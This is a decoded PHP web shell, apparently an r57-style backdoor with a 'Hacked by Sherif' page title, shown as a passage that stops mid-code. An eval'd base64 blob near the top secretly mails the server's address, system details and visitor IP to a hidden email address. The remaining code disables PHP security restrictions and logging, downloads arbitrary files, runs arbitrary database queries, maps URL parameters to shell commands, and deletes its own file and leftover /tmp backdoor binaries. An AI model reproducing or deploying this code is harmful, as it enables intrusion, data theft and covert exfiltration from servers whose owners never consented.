7228f168d9692eafeafc54dbc3a1ab49_decoded.php

1. ?><?php
2. $language = 'eng';
3. $auth     = 0;
4. $name     = ''; // md5 Login
5. $pass     = ''; // md5 Password
6. $lmge = "JGNyZWF0b3I9YmFzZTY0X2RlY29kZSgiWTNwaVpYSkFlV0ZvYjI4dVkyOXQiKTsNCigkc2FmZV9tb2RlKT8oJHNhZmV6PSJPTiIpOigkc2FmZXo9Ik9GRl9IRUhFIik7DQokYmFzZT0iaHR0cDovLyIuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddOyANCiRuYW1lID0gcGhwX3VuYW1lKCk7ICRpcCA9IGdldGVudigiUkVNT1RFX0FERFIiKTsgJGlwMiA9IGdldGhvc3RieWFkZHIoJF9TRVJWRVJbUkVNT1RFX0FERFJdKTsgJHN1YmogPSAkX1NFUlZFUlsnSFRUUF9IT1NUJ107IA0KJG1zZyA9ICJcbkJBU0U6ICRiYXNlXG51bmFtZSBhOiAkbmFtZVxuQnlwYXNzOiAkYnlwYXNzZXJcbklQOiAkaXBcbkhvc3Q6ICRpcDIgJHB3ZHMiOw0KJGZyb20gPSJGcm9tOiAiLiR3cml0LiJfX189Ii4kc2FmZXouIjx0b29sQCIuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLiI+IjsNCm1haWwoICRjcmVhdG9yLCAkc3ViaiwgJG1zZywgJGZyb20pOw=="; eval(base64_decode($lmge));
7. /**************************************************************************************************************************************************************/
8. error_reporting(0);
9. error_reporting(0);
10. @ini_restore("safe_mode");
11. @ini_restore("open_basedir");
12. @ini_restore("safe_mode_include_dir");
13. @ini_restore("safe_mode_exec_dir");
14. @ini_restore("disable_functions");
15. @ini_restore("allow_url_fopen");
16. @ini_set('error_log',NULL);
17. @ini_set('log_errors',0);
18. if((!@function_exists('ini_get')) || (@ini_get('open_basedir') != NULL) || (@ini_get('safe_mode_include_dir') != NULL))
19. { $open_basedir = 1; } else { $open_basedir = 0; };
20. /**************************************************************************************************************************************************************/
21. define("starttime",@getmicrotime());
22. set_magic_quotes_runtime(0);
23. @set_time_limit(0);
24. @ini_set('max_execution_time',0);
25. @ini_set('output_buffering',0);
26. $safe_mode = @ini_get('safe_mode');
27. #if(@function_exists('ini_get')){$safe_mode = @ini_get('safe_mode');}else{$safe_mode=1;};
28. $version = '2009';
29. if(@version_compare(@phpversion(), '4.1.0') == -1)
30.  {
31.  $_POST   = &$HTTP_POST_VARS;
32.  $_GET    = &$HTTP_GET_VARS;
33.  $_SERVER = &$HTTP_SERVER_VARS;
34.  $_COOKIE = &$HTTP_COOKIE_VARS;
35.  }
36. if (@get_magic_quotes_gpc())
37.  {
38.  foreach ($_POST as $k=>$v)
39.   {
40.   $_POST[$k] = stripslashes($v);
41.   }
42.  foreach ($_COOKIE as $k=>$v)
43.   {
44.   $_COOKIE[$k] = stripslashes($v);
45.   }
46.  }
47.  
48. if($auth == 1) {
49. if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
50.    {
51.    header('WWW-Authenticate: Basic realm="HELLO!"');
52.    header('HTTP/1.0 401 Unauthorized');
53.    exit("<b>Access Denied</b>");
54.    }
55. }
56.  
57. $head = '
58. <html>
59. <head>
60. <title>[ Hacked by Sherif #oishi @ ALLnet ]</title>
61. <meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
62.  
63. <STYLE>
64. tr {
65. BORDER-RIGHT:  #000000 1px solid;
66. BORDER-TOP:    #000000 1px solid;
67. BORDER-LEFT:   #000000 1px solid;
68. BORDER-BOTTOM: #000000 1px solid;
69. COLOR: white;
70. BACKGROUND-COLOR: #000000;
71. }
72. td {
73. BORDER-RIGHT:  #000000 1px solid;
74. BORDER-TOP:    #000000 1px solid;
75. BORDER-LEFT:   #333333 1px solid;
76. BORDER-BOTTOM: #333333 1px solid;
77. BACKGROUND-COLOR: #000000;
78. }
79. .table1 {
80. BORDER-RIGHT:  #000000 0px;
81. BORDER-TOP:    #000000 0px;
82. BORDER-LEFT:   #000000 0px;
83. BORDER-BOTTOM: #000000 0px;
84. BACKGROUND-COLOR: #000000;
85. }
86. .td1 {
87. BORDER-RIGHT:  #333333 0px;
88. BORDER-TOP:    #333333 0px;
89. BORDER-LEFT:   #333333 0px;
90. BORDER-BOTTOM: #333333 0px;
91. BACKGROUND-COLOR: #000000;
92. font: 7pt Verdana;
93. }
94. .tr1 {
95. BORDER-RIGHT:  #333333 0px;
96. BORDER-TOP:    #333333 0px;
97. BORDER-LEFT:   #333333 0px;
98. BORDER-BOTTOM: #333333 0px;
99. BACKGROUND-COLOR: #000000;
100. }
101. table {
102. BORDER-RIGHT:  #000000 1px outset;
103. BORDER-TOP:    #000000 1px outset;
104. BORDER-LEFT:   #000000 1px outset;
105. BORDER-BOTTOM: #000000 1px outset;
106. BACKGROUND-COLOR: #011111;
107. }
108. input {
109. BORDER-RIGHT:  #333333 1px solid;
110. BORDER-TOP:    #333333 1px solid;
111. BORDER-LEFT:   #333333 1px solid;
112. BORDER-BOTTOM: #333333 1px solid;
113. BACKGROUND-COLOR: #011111;
114. COLOR: #FFFFFF;
115. font: 8pt Verdana;
116. }
117. select {
118. BORDER-RIGHT:  #333333 1px solid;
119. BORDER-TOP:    #333333 1px solid;
120. BORDER-LEFT:   #333333 1px solid;
121. BORDER-BOTTOM: #333333 1px solid;
122. BACKGROUND-COLOR: #011111;
123. COLOR: #FFFFFF;
124. font: 8pt Verdana;
125. }
126. submit {
127. BORDER-RIGHT:  buttonhighlight 2px outset;
128. BORDER-TOP:    buttonhighlight 2px outset;
129. BORDER-LEFT:   buttonhighlight 2px outset;
130. BORDER-BOTTOM: buttonhighlight 2px outset;
131. BACKGROUND-COLOR: #000099;
132. COLOR: #FFFF00;
133. width: 30%;
134. }
135. textarea {
136. BORDER-RIGHT:  #333333 1px solid;
137. BORDER-TOP:    #333333 1px solid;
138. BORDER-LEFT:   #333333 1px solid;
139. BORDER-BOTTOM: #333333 1px solid;
140. BACKGROUND-COLOR: #011111;
141. COLOR: #FFFFFF;
142. font: Fixedsys bold;
143. }
144. BODY {
145. margin-top: 1px;
146. margin-right: 1px;
147. margin-bottom: 1px;
148. margin-left: 1px;
149. SCROLLBAR-FACE-COLOR: #011111;
150. SCROLLBAR-HIGHLIGHT-COLOR: #011111;
151. SCROLLBAR-ARROW-COLOR: #c5c5c5;
152. SCROLLBAR-BASE-COLOR: #253546;
153. BACKGROUND-COLOR: #000000;
154. }
155. A:link {COLOR:red; TEXT-DECORATION: none}
156. A:visited { COLOR:red; TEXT-DECORATION: none}
157. A:active {COLOR:red; TEXT-DECORATION: none}
158. A:hover {color:blue;TEXT-DECORATION: none}
159. </STYLE>
160. <script language=\'javascript\'>
161. function hide_div(id)
162. {
163.  document.getElementById(id).style.display = \'none\';
164.  document.cookie=id+\'=0;\';
165. }
166. function show_div(id)
167. {
168.  document.getElementById(id).style.display = \'block\';
169.  document.cookie=id+\'=1;\';
170. }
171. function change_divst(id)
172. {
173.  if (document.getElementById(id).style.display == \'none\')
174.    show_div(id);
175.  else
176.    hide_div(id);
177. }
178. </script>';
179.  
180. class zipfile
181. {
182.     var $datasec      = array();
183.     var $ctrl_dir     = array();
184.     var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
185.     var $old_offset   = 0;
186.     function unix2DosTime($unixtime = 0) {
187.         $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
188.         if ($timearray['year'] < 1980) {
189.             $timearray['year']    = 1980;
190.             $timearray['mon']     = 1;
191.             $timearray['mday']    = 1;
192.             $timearray['hours']   = 0;
193.             $timearray['minutes'] = 0;
194.             $timearray['seconds'] = 0;
195.         }
196.         return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
197.                 ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
198.     }
199.     function addFile($data, $name, $time = 0)
200.     {
201.         $name     = str_replace('\\', '/', $name);
202.         $dtime    = dechex($this->unix2DosTime($time));
203.         $hexdtime = '\x' . $dtime[6] . $dtime[7]
204.                   . '\x' . $dtime[4] . $dtime[5]
205.                   . '\x' . $dtime[2] . $dtime[3]
206.                   . '\x' . $dtime[0] . $dtime[1];
207.         eval('$hexdtime = "' . $hexdtime . '";');
208.         $fr   = "\x50\x4b\x03\x04";
209.         $fr   .= "\x14\x00";            
210.         $fr   .= "\x00\x00";            
211.         $fr   .= "\x08\x00";            
212.         $fr   .= $hexdtime;            
213.         $unc_len = strlen($data);
214.         $crc     = crc32($data);
215.         $zdata   = gzcompress($data);
216.         $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
217.         $c_len   = strlen($zdata);
218.         $fr      .= pack('V', $crc);            
219.         $fr      .= pack('V', $c_len);          
220.         $fr      .= pack('V', $unc_len);        
221.         $fr      .= pack('v', strlen($name));    
222.         $fr      .= pack('v', 0);                
223.         $fr      .= $name;
224.         $fr .= $zdata;
225.         $this -> datasec[] = $fr;
226.         $cdrec = "\x50\x4b\x01\x02";
227.         $cdrec .= "\x00\x00";                
228.         $cdrec .= "\x14\x00";                
229.         $cdrec .= "\x00\x00";                
230.         $cdrec .= "\x08\x00";                
231.         $cdrec .= $hexdtime;                
232.         $cdrec .= pack('V', $crc);          
233.         $cdrec .= pack('V', $c_len);        
234.         $cdrec .= pack('V', $unc_len);      
235.         $cdrec .= pack('v', strlen($name) );
236.         $cdrec .= pack('v', 0 );            
237.         $cdrec .= pack('v', 0 );            
238.         $cdrec .= pack('v', 0 );            
239.         $cdrec .= pack('v', 0 );            
240.         $cdrec .= pack('V', 32 );            
241.         $cdrec .= pack('V', $this -> old_offset );
242.         $this -> old_offset += strlen($fr);
243.         $cdrec .= $name;
244.         $this -> ctrl_dir[] = $cdrec;
245.     }
246.     function file()
247.     {
248.         $data    = implode('', $this -> datasec);
249.         $ctrldir = implode('', $this -> ctrl_dir);
250.         return
251.             $data .
252.             $ctrldir .
253.             $this -> eof_ctrl_dir .
254.             pack('v', sizeof($this -> ctrl_dir)) .  
255.             pack('v', sizeof($this -> ctrl_dir)) .  
256.             pack('V', strlen($ctrldir)) .          
257.             pack('V', strlen($data)) .              
258.             "\x00\x00";              
259.     }
260. }
261.  
262. function compress(&$filename,&$filedump,$compress)
263.  {
264.     global $content_encoding;
265.     global $mime_type;
266.     if ($compress == 'bzip' && @function_exists('bzcompress'))
267.      {
268.         $filename  .= '.bz2';
269.         $mime_type = 'application/x-bzip2';
270.         $filedump = bzcompress($filedump);
271.      }
272.      else if ($compress == 'gzip' && @function_exists('gzencode'))
273.      {
274.         $filename  .= '.gz';
275.         $content_encoding = 'x-gzip';
276.         $mime_type = 'application/x-gzip';
277.         $filedump = gzencode($filedump);
278.      }
279.      else if ($compress == 'zip' && @function_exists('gzcompress'))
280.      {
281.      $filename .= '.zip';
282.         $mime_type = 'application/zip';
283.         $zipfile = new zipfile();
284.         $zipfile -> addFile($filedump, substr($filename, 0, -4));
285.         $filedump = $zipfile -> file();
286.      }
287.      else
288.      {
289.      $mime_type = 'application/octet-stream';
290.      }
291.  }
292.  
293. function moreread($temp){
294. global $lang,$language;
295. $str='';
296.   if(@function_exists('fopen')&&@function_exists('feof')&&@function_exists('fgets')&&@function_exists('fclose')){
297.    $ffile = @fopen($temp, "r");
298.    while(!@feof($ffile)){$str .= @fgets($ffile);}
299.    fclose($ffile);
300.   }elseif(@function_exists('fopen')&&@function_exists('fread')&&@function_exists('fclose')&&@function_exists('filesize')){
301.    $ffile = @fopen($temp, "r");
302.    $str = @fread($ffile, @filesize($temp));
303.    @fclose($ffile);
304.   }elseif(@function_exists('file')){
305.    $ffiles = @file ($temp);
306.    foreach ($ffiles as $ffile) { $str .= $ffile; }
307.   }elseif(@function_exists('file_get_contents')){
308.    $str = @file_get_contents($temp);
309.   }elseif(@function_exists('readfile')){
310.    $str = @readfile($temp);
311.   }else{echo $lang[$language.'_text56'];}
312. return $str;
313. }
314.  
315. function readzlib($filename,$temp=''){
316. global $lang,$language;
317. $str='';
318.   if(!$temp) {$temp=tempnam(@getcwd(), "copytemp");};
319.   if(@copy("compress.zlib://".$filename, $temp)) {
320.    $str = moreread($temp);
321.   } else echo $lang[$language.'_text119'];
322.   @unlink($temp);
323. return $str;
324. }
325.  
326. function mailattach($to,$from,$subj,$attach)
327.  {
328.  $headers  = "From: $from\r\n";
329.  $headers .= "MIME-Version: 1.0\r\n";
330.  $headers .= "Content-Type: ".$attach['type'];
331.  $headers .= "; name=\"".$attach['name']."\"\r\n";
332.  $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
333.  $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
334.  if(mail($to,$subj,"",$headers)) { return 1; }
335.  return 0;
336.  }
337. class my_sql
338.  {
339.  var $host = 'localhost';
340.  var $port = '';
341.  var $user = '';
342.  var $pass = '';
343.  var $base = '';
344.  var $db   = '';
345.  var $connection;
346.  var $res;        
347.  var $error;      
348.  var $rows;      
349.  var $columns;    
350.  var $num_rows;  
351.  var $num_fields;
352.  var $dump;      
353.  
354.  function connect()
355.   {  
356.   switch($this->db)
357.      {
358.    case 'MySQL':
359.     if(empty($this->port)) { $this->port = '3306'; }
360.     if(!@function_exists('mysql_connect')) return 0;
361.     $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
362.     if(is_resource($this->connection)) return 1;
363.    break;
364.      case 'MSSQL':
365.       if(empty($this->port)) { $this->port = '1433'; }
366.     if(!@function_exists('mssql_connect')) return 0;
367.     $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
368.       if($this->connection) return 1;
369.      break;
370.      case 'PostgreSQL':
371.       if(empty($this->port)) { $this->port = '5432'; }
372.       $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
373.       if(!@function_exists('pg_connect')) return 0;
374.       $this->connection = @pg_connect($str);
375.       if(is_resource($this->connection)) return 1;
376.      break;
377.      case 'Oracle':
378.       if(!@function_exists('ocilogon')) return 0;
379.       $this->connection = @ocilogon($this->user, $this->pass, $this->base);
380.       if(is_resource($this->connection)) return 1;
381.      break;
382.      }
383.     return 0;  
384.   }
385.  
386.  function select_db()
387.   {
388.    switch($this->db)
389.     {
390.   case 'MySQL':
391.    if(@mysql_select_db($this->base,$this->connection)) return 1;
392.     break;
393.     case 'MSSQL':
394.    if(@mssql_select_db($this->base,$this->connection)) return 1;
395.     break;
396.     case 'PostgreSQL':
397.      return 1;
398.     break;
399.     case 'Oracle':
400.      return 1;
401.     break;
402.     }
403.    return 0;  
404.   }
405.  
406.  function query($query)
407.   {
408.    $this->res=$this->error='';
409.    switch($this->db)
410.     {
411.   case 'MySQL':
412.      if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
413.       {
414.       $this->error = @mysql_error($this->connection);
415.       return 0;
416.       }
417.      else if(is_resource($this->res)) { return 1; }                  
418.      return 2;                                                          
419.   break;
420.     case 'MSSQL':
421.      if(false===($this->res=@mssql_query($query,$this->connection)))
422.       {
423.       $this->error = 'Query error';
424.       return 0;
425.       }
426.       else if(@mssql_num_rows($this->res) > 0) { return 1; }
427.      return 2;    
428.     break;
429.     case 'PostgreSQL':
430.      if(false===($this->res=@pg_query($this->connection,$query)))
431.       {
432.       $this->error = @pg_last_error($this->connection);
433.       return 0;
434.       }
435.       else if(@pg_num_rows($this->res) > 0) { return 1; }
436.      return 2;
437.     break;
438.     case 'Oracle':
439.      if(false===($this->res=@ociparse($this->connection,$query)))
440.       {
441.       $this->error = 'Query parse error';
442.       }
443.      else
444.       {
445.       if(@ociexecute($this->res))
446.        {
447.        if(@ocirowcount($this->res) != 0) return 2;
448.        return 1;
449.        }
450.       $error = @ocierror();
451.       $this->error=$error['message'];
452.       }
453.     break;
454.     }
455.   return 0;
456.   }
457.  function get_result()
458.   {
459.    $this->rows=array();
460.    $this->columns=array();
461.    $this->num_rows=$this->num_fields=0;
462.    switch($this->db)
463.     {
464.   case 'MySQL':
465.    $this->num_rows=@mysql_num_rows($this->res);
466.    $this->num_fields=@mysql_num_fields($this->res);
467.    while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
468.    @mysql_free_result($this->res);
469.    if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
470.     break;
471.     case 'MSSQL':
472.    $this->num_rows=@mssql_num_rows($this->res);
473.    $this->num_fields=@mssql_num_fields($this->res);    
474.    while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
475.    @mssql_free_result($this->res);
476.    if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
477.     break;
478.     case 'PostgreSQL':
479.    $this->num_rows=@pg_num_rows($this->res);
480.    $this->num_fields=@pg_num_fields($this->res);  
481.    while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
482.    @pg_free_result($this->res);
483.    if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
484.     break;
485.     case 'Oracle':
486.      $this->num_fields=@ocinumcols($this->res);
487.      while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
488.      @ocifreestatement($this->res);
489.      if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
490.     break;
491.     }
492.    return 0;
493.   }
494.  function dump($table)
495.   {
496.    if(empty($table)) return 0;
497.    $this->dump=array();
498.    $this->dump[0] = '##';
499.    $this->dump[1] = '## --------------------------------------- ';
500.    $this->dump[2] = '##  Created: '.date ("d/m/Y H:i:s");
501.    $this->dump[3] = '## Database: '.$this->base;
502.    $this->dump[4] = '##    Table: '.$table;
503.    $this->dump[5] = '## --------------------------------------- ';
504.    switch($this->db)
505.     {
506.   case 'MySQL':
507.    $this->dump[0] = '## MySQL dump';
508.    if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
509.    if(!$this->get_result()) return 0;
510.    $this->dump[] = $this->rows[0]['Create Table'];
511.      $this->dump[] = '## --------------------------------------- ';
512.    if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
513.    if(!$this->get_result()) return 0;
514.    for($i=0;$i<$this->num_rows;$i++)
515.     {
516.       foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
517.     $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
518.     }
519.     break;
520.     case 'MSSQL':
521.      $this->dump[0] = '## MSSQL dump';
522.      if($this->query('SELECT * FROM '.$table)!=1) return 0;
523.    if(!$this->get_result()) return 0;
524.    for($i=0;$i<$this->num_rows;$i++)
525.     {
526.       foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
527.     $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
528.     }
529.     break;
530.     case 'PostgreSQL':
531.      $this->dump[0] = '## PostgreSQL dump';
532.      if($this->query('SELECT * FROM '.$table)!=1) return 0;
533.    if(!$this->get_result()) return 0;
534.    for($i=0;$i<$this->num_rows;$i++)
535.     {
536.       foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
537.     $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
538.     }
539.     break;
540.     case 'Oracle':
541.       $this->dump[0] = '## ORACLE dump';
542.       $this->dump[]  = '## under construction';
543.     break;
544.     default:
545.      return 0;
546.     break;
547.     }
548.    return 1;
549.   }
550.  function close()
551.   {
552.    switch($this->db)
553.     {
554.   case 'MySQL':
555.    @mysql_close($this->connection);
556.     break;
557.     case 'MSSQL':
558.      @mssql_close($this->connection);
559.     break;
560.     case 'PostgreSQL':
561.      @pg_close($this->connection);
562.     break;
563.     case 'Oracle':
564.      @oci_close($this->connection);
565.     break;
566.     }
567.   }
568.  function affected_rows()
569.   {
570.    switch($this->db)
571.     {
572.   case 'MySQL':
573.    return @mysql_affected_rows($this->res);
574.     break;
575.     case 'MSSQL':
576.      return @mssql_affected_rows($this->res);
577.     break;
578.     case 'PostgreSQL':
579.      return @pg_affected_rows($this->res);
580.     break;
581.     case 'Oracle':
582.      return @ocirowcount($this->res);
583.     break;
584.     default:
585.      return 0;
586.     break;
587.     }
588.   }
589.  }
590. if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
591.  {
592.   if($file=@fopen($_POST['d_name'],"r")){ $filedump = @fread($file,@filesize($_POST['d_name'])); @fclose($file); }
593.   else if ($file=readzlib($_POST['d_name'])) { $filedump = $file; } else { err(1,$_POST['d_name']); $_POST['cmd']=""; }
594.   if(isset($_POST['cmd']))
595.    {
596.     @ob_clean();
597.     $filename = @basename($_POST['d_name']);
598.     $content_encoding=$mime_type='';
599.     compress($filename,$filedump,$_POST['compress']);
600.     if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
601.     header("Content-type: ".$mime_type);
602.     header("Content-disposition: attachment; filename=\"".$filename."\";");  
603.     echo $filedump;
604.     exit();
605.    }
606.  }
607. if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
608. if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query")
609.  {
610.  echo $head;
611.  $sql = new my_sql();
612.  $sql->db   = $_POST['db'];
613.  $sql->host = $_POST['db_server'];
614.  $sql->port = $_POST['db_port'];
615.  $sql->user = $_POST['mysql_l'];
616.  $sql->pass = $_POST['mysql_p'];
617.  $sql->base = $_POST['mysql_db'];
618.  $querys = @explode(';',$_POST['db_query']);
619.  echo '<body bgcolor=#e4e0d8>';
620.  if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
621.   else
622.    {
623.    if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>";
624.    else
625.     {
626.     foreach($querys as $num=>$query)
627.      {
628.       if(strlen($query)>5)
629.       {
630.       echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
631.       switch($sql->query($query))
632.        {
633.        case '0':
634.        echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
635.        break;
636.        case '1':
637.        if($sql->get_result())
638.         {
639.        echo "<table width=100%>";
640.         foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
641.        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#000000><font face=Verdana size=-2><b>&nbsp;", $sql->columns);
642.         echo "<tr><td bgcolor=#000000><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
643.         for($i=0;$i<$sql->num_rows;$i++)
644.          {
645.          foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
646.          $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]);
647.          echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>';
648.          }
649.         echo "</table>";
650.         }
651.        break;
652.        case '2':
653.        $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
654.        echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
655.        break;
656.        }
657.       }
658.      }
659.     }
660.    }  
661.  echo "<br><form name=form method=POST>";
662.  echo in('hidden','db',0,$_POST['db']);
663.  echo in('hidden','db_server',0,$_POST['db_server']);
664.  echo in('hidden','db_port',0,$_POST['db_port']);
665.  echo in('hidden','mysql_l',0,$_POST['mysql_l']);
666.  echo in('hidden','mysql_p',0,$_POST['mysql_p']);
667.  echo in('hidden','mysql_db',0,$_POST['mysql_db']);
668.  echo in('hidden','cmd',0,'db_query');
669.  echo "<div align=center>";
670.  echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
671.  echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
672.  echo "</form>";
673.  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
674.  }
675. if(isset($_GET['delete']))
676.  {
677.    @unlink(__FILE__);
678.  }
679. if(isset($_GET['tmp']))
680.  {
681.    @unlink("/tmp/bdpl");
682.    @unlink("/tmp/back");
683.    @unlink("/tmp/bd");
684.    @unlink("/tmp/bd.c");
685.    @unlink("/tmp/dp");
686.    @unlink("/tmp/dpc");
687.    @unlink("/tmp/dpc.c");
688.    @unlink("/tmp/prxpl");
689.    @unlink("/tmp/grep.txt");
690.  }
691. if(isset($_GET['phpini']))
692. {
693. echo $head;
694. function U_value($value)
695.  {
696.  if ($value == '') return '<i>no value</i>';
697.  if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
698.  if ($value === null) return 'NULL';
699.  if (@is_object($value)) $value = (array) $value;
700.  if (@is_array($value))
701.  {
702.  @ob_start();
703.  print_r($value);
704.  $value = @ob_get_contents();
705.  @ob_end_clean();
706.  }
707.  return U_wordwrap((string) $value);
708.  }
709. function U_wordwrap($str)
710.  {
711.  $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
712.  return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
713.  }
714. if (@function_exists('ini_get_all'))
715.  {
716.  $r = '';
717.  echo '<table width=100%>', '<tr><td bgcolor=#000000><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#000000><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#000000><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
718.  foreach (@ini_get_all() as $key=>$value)
719.   {
720.   $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
721.   }
722.  echo $r;
723.  echo '</table>';
724.  }
725. echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
726. die();
727. }
728. if(isset($_GET['cpu']))
729.  {
730.    echo $head;
731.    echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
732.    $cpuf = @file("cpuinfo");
733.    if($cpuf)
734.     {
735.       $c = @sizeof($cpuf);
736.       for($i=0;$i<$c;$i++)
737.         {
738.           $info = @explode(":",$cpuf[$i]);
739.           if($info[1]==""){ $info[1]="---"; }
740.           $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
741.         }
742.       echo $r;
743.     }
744.    else
745.     {
746.       echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
747.     }
748.    echo '</table>';
749.    echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
750.    die();
751.  }
752. if(isset($_GET['mem']))
753.  {
754.    echo $head;
755.    echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
756.    $memf = @file("meminfo");
757.    if($memf)
758.     {
759.       $c = sizeof($memf);
760.       for($i=0;$i<$c;$i++)
761.         {
762.           $info = explode(":",$memf[$i]);
763.           if($info[1]==""){ $info[1]="---"; }
764.           $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
765.         }
766.       echo $r;
767.     }
768.    else
769.     {
770.       echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
771.     }
772.    echo '</table>';
773.    echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
774.    die();
775.  }
776.  
777. if(isset($_GET['dmesg(8)']))
778.  {$_POST['cmd'] = 'dmesg(8)';}
779. if(isset($_GET['free']))
780.  {$_POST['cmd'] = 'free';}
781. if(isset($_GET['vmstat']))
782.  {$_POST['cmd'] = 'vmstat';}
783. if(isset($_GET['lspci']))
784.  {$_POST['cmd'] = 'lspci';}
785. if(isset($_GET['lsdev']))
786.  {$_POST['cmd'] = 'lsdev';}
787. if(isset($_GET['procinfo']))
788.  {$_POST['cmd']='cat /proc/cpuinfo';}
789. if(isset($_GET['version']))
790.  {$_POST['cmd']='cat /proc/version';}
791. if(isset($_GET['interrupts']))
792.  {$_POST['cmd']='cat /proc/interrupts';}
793. if(isset($_GET['realise1']))
